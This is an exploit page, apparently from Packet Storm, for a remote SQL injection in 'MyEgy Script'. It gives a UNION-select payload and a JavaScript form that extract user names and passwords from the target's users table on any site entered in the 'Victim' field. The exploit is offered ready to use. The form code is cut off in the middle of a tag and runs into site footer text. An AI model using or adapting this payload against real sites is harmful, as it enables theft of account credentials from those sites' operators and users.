MyEgy Script suffers from a remote SQL injection vulnerability.
344a20a85a52a308d091f3c0bf9281361d30a96cb16daed4ba3ee34709bde521<html>
<!--
Script Name :MyEgy Script
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email : K4rar@yahoo.com , ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
..style1 {
text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
for(var n =1;n<co;n++){
if(tmp){
var tmp = tmp+n+",";
}else{
var tmp = n+",";
}
}
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed